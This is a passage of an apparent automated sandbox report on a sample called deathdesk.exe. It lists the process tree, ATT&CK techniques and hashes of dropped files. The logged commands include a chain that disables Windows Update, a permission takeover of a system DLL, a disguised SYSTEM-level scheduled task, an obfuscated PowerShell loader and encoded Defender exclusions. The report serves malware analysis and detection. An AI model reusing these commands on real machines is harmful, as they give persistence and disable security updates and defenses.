reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:1576

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1316

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1552

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:1144

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1224

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:928

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1316

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:748

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1576

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:580

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1192

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:1152

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:580

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:1552

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:1968

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:1044

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:1548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:1764

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
PID:748

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
PID:928

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:748

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "pafjeidn"
5⤵
PID:1184

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe upllvnsasynduz0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/uRBdzBbARXJORiik2Sx/+H9wjFHDytg6DLg9HTQvkE5ALCQj7owRYujmHJ4XTvr35nONfBbT15K49AElHCZc9b3L+WtM3wSoYURfS6oE8s90JTRPwOdk68mfzMlMllxvFZyJlpw/XoCCOeiTRAEEcRc4avJXSjzqHk+H3hFxfnZMSOJlYzthiNUv4bAhzvjLvkcHjqI4bUGkgiQbX+2rjtnpcXilyGt9CTSyzd0ruWtFyQa75QOKv3aMwNxRClMTxv4A/+bhqsWLWTg4No8bR2LstECo+sVsehg6CeDIUyRtmREqFlafegwFx9+R9SlLRNR0J1PPhjWzdOETVaW5EAMzOGJ4kD/pIfNzHr4+lgfq6cdA5U2kOA/jp2ABbxRxZtANBl7mVRsyKjUGo6wb4mbVoMd5zhqAdoCD8xAvSmfiNfWw1V0FZjBQDYqnqSTOo9qDlQnZ5XVUBB0UEMv1rmVqG5nzTdfGcxX1JcnjKJ8=
5⤵
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:588

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
3⤵
PID:1992

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7388b018-748c-48b5-9fab-ed1696f134d4}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{83399de7-dc3e-4759-aefc-cec1e924ea45}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1840

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/kazareworking/public_deathdesk/blob/main/deathdesk.exe
2⤵
- Loads dropped DLL
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2032

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2032 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1880

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\deathdesk.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\deathdesk.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAaQB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBjAG0AdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAGYAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB6AG8AawBwACMAPgA="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:624

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1268

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1260

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1384

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:320

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1720

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1584

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:1640

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1016

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1976

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:624

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1152

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1612

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:840

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1932

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:560

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1144

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1656

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1316

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:320

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Drops file in Windows directory
PID:1768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
PID:1544

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
5⤵
- Creates scheduled task(s)
PID:1548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1192

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:1584

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1328

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17151256311809088980-216606685-2038153919-148269137415514171481550803768-981297624"
1⤵
PID:1548

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11008548702125065941-1839205599-1487608118-18827920211693846493-79636174440976887"
1⤵
PID:1072

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "213353946187433944482253100-1988595151-672447940-1112017293-1330180464-1524472148"
1⤵
PID:812

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2027915383-1000919223-18051729801778043615-1971306213-548132035-2038189458-574571428"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1552

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50CD3D75D026C82E2E718570BD6F44D0_60E83F2095C16CA099C94596E7B8AA5D
Filesize
434B

MD5
8c0cad491885d9d2403f33e6d7c536b5

SHA1
b1b980080392315b8737d46e3a417b7cb8c30055

SHA256
04b2541043c19c67cdf1d94feffde3e3b4b9fbbb79eb6418f6f74c2f43525276

SHA512
1e907f9cf1c91b876600be8478217f58e9d564b74dffbbd485399c70aa437fa7a77dad0b0c179812cbfcb0565f25d0ff4b72916b600050bea9814d9da49b5dd7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
Filesize
446B

MD5
e9b3c0c825ce3c624dd56a88e64d0ee2

SHA1
cc9c2d0c4b58e1337ec197dee752df36749bca44

SHA256
a2f6c740f7bca0ef676421253d73bd07e23649b61a97f64aa5f2b05b259c2f91

SHA512
ef278ea855522ca7cdc64174fde9203ae30209f909c08d833e49bbb0bbdcf2a1c7241136d740a8b083e9cef3b0b12911446f83ab0a4e7a5403224393b1cf6e7d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
8c06dd41bbc30d33b1b169a072a485df

SHA1
eede59b9068667f71e7c3c02e778986a6d2f9013

SHA256
ac9dc5a4a13a8c7d2c8da85d05d42e9bc758508d7275204730d481c6abb2d9fc

SHA512
4c26761c8e92aa53812ccb58f5fe3a54b5eb03ae1862cc54b7c230232947a00167f513ed48bf7885e440aeec8097481efe8dd9cbd5ba18e340da3dd4e0e2927f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize
430B

MD5
ec7344376015f816268f9441d8113408

SHA1
c8b76a60a72d72cff409c6821f79e3af158fb902

SHA256
268036bfe4d42d650340c265190adb71fa46c90af1205907cffa3baff8f32d7b

SHA512
5027d0b3b59122b1b346f4db81aad4cd9a41712c8dae1fe7c4f5bc61887ac8736f722cb1ba170976b7f4d98a58312d75469bfd5e353d6d0fb253eb2ca4bbae75

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize
434B

MD5
93ccc45346806ba7f27ced86b05e6729

SHA1
1af96b1a4728a2ad803fb765c98778f78eeb010f

SHA256
648cfe42a2aefe1329fcdeda15c1c3621f59e7400b8bf287a6e20fd4cd83b0d5

SHA512
dd4b96cfff3692de9fba9af9d7d953f23bbb3fadb3f206122fea69dde36b7a8dd1aacfe105f4b0c524dc03fc3085ffc6dd24490a8a0a64518989b3b062c09600

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
912e6a8a638875cf264f6591b7fa1388

SHA1
c1ce60516fea7a4f4945874b9ab35aa7120dca10

SHA256
7ca43edc365cbd4ff032a3c8dd9e020aac4336d605a0ec6a5823612be46c3f97

SHA512
6aac65f30632535c1d800a5281078c7ab0ea5b7cbe6dd4cafd6b8fe3eda38964adf8d3f708fe1576cb01898389b2979190e54ee844a59690ce5b7785cee29156

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
Filesize
5KB

MD5
26761bb7447666ec9c3b808f211f57a0

SHA1
db3ae3fa9242a6e1c600b00150b01d087ee62889

SHA256
f071740376c834a053fa99a382c7f8af90e0b269a6a0211a7698129cd94c2207

SHA512
0347813be0e043a1e9252d8229349030a6f8b0a9487b6b4cb4081a86ebe0cda8e7f592c8011c0b92e80bbe49cef9880754a1e8c85ff7a5c57b504b8e34d0a2f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\deathdesk.exe
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\deathdesk.exe.vtooxqh.partial
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BMVNHDGX.txt
Filesize
603B

MD5
7cd7cfac289cf969650de74fc63db722

SHA1
caa6a9173b3f4d5180b4c02f1a6c13151e68ebf4

SHA256
294527d661280e94e78c3fa6e70912aa4aec4df89c51ee057aa8c4d7cf1d55de

SHA512
d0fb2a18268be0733a40cc0af0a3054c5c21a1de3d6b9e2cda6a6dbe87fc9cb0bf856d0e46094fc28ec25b351ffd8088d6a202eccd0c6c7c1fde681c2695755a

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
dd38021426684bc2b7a7709f642603c2

SHA1
7155829b8c754e2d1a2a9ec12ddc567bf806e738

SHA256
2fb0c48bf8be606f7dd5e82567d4f4446a663da6d6064d131a186128b3f1a89f

SHA512
8643a2c698379b5727a94d7a4ba17860484d6d48d2f2feace96b4b22eb718eafca4ece44c604224e737ae4b3fbd46d03782e88a7a1d0dfdd1f82a1cfcdf6aea5

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\deathdesk.exe
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
memory/112-343-0x0000000000000000-mapping.dmp

Download
memory/284-265-0x0000000001C30000-0x0000000001C5A000-memory.dmp

Filesize
168KB

Download
memory/296-357-0x0000000000000000-mapping.dmp

Download
memory/300-267-0x0000000037AB0000-0x0000000037AC0000-memory.dmp

Filesize
64KB

Download
memory/300-266-0x0000000000930000-0x000000000095A000-memory.dmp

Filesize
168KB

Download
memory/320-317-0x0000000000E50000-0x0000000000E7A000-memory.dmp

Filesize
168KB

Download
memory/320-440-0x0000000000000000-mapping.dmp

Download
memory/320-136-0x0000000000000000-mapping.dmp

Download
memory/320-290-0x0000000000E50000-0x0000000000E7A000-memory.dmp

Filesize
168KB

Download
memory/320-78-0x0000000000000000-mapping.dmp

Download
memory/320-281-0x0000000000970000-0x00000000009F0000-memory.dmp

Filesize
512KB

Download
memory/320-160-0x000007FEEDDA0000-0x000007FEEE7C3000-memory.dmp

Filesize
10.1MB

Download
memory/320-119-0x0000000000000000-mapping.dmp

Download
memory/320-308-0x0000000000970000-0x00000000009F0000-memory.dmp

Filesize
512KB

Download
memory/420-153-0x000007FEBF7A0000-0x000007FEBF7B0000-memory.dmp

Filesize
64KB

Download
memory/420-154-0x0000000037AB0000-0x0000000037AC0000-memory.dmp

Filesize
64KB

Download
memory/420-314-0x0000000000870000-0x000000000089A000-memory.dmp

Filesize
168KB

Download
memory/420-170-0x0000000000870000-0x000000000089A000-memory.dmp

Filesize
168KB

Download
memory/420-150-0x00000000007B0000-0x00000000007D3000-memory.dmp

Filesize
140KB

Download
memory/420-167-0x00000000007B0000-0x00000000007D3000-memory.dmp

Filesize
140KB

Download
memory/468-157-0x000007FEBF7A0000-0x000007FEBF7B0000-memory.dmp

Filesize
64KB

Download
memory/468-159-0x0000000037AB0000-0x0000000037AC0000-memory.dmp

Filesize
64KB

Download
memory/468-173-0x0000000000160000-0x000000000018A000-memory.dmp

Filesize
168KB

Download
memory/476-166-0x0000000037AB0000-0x0000000037AC0000-memory.dmp

Filesize
64KB

Download
memory/476-165-0x000007FEBF7A0000-0x000007FEBF7B0000-memory.dmp

Filesize
64KB

Download
memory/476-176-0x0000000000070000-0x000000000009A000-memory.dmp

Filesize
168KB

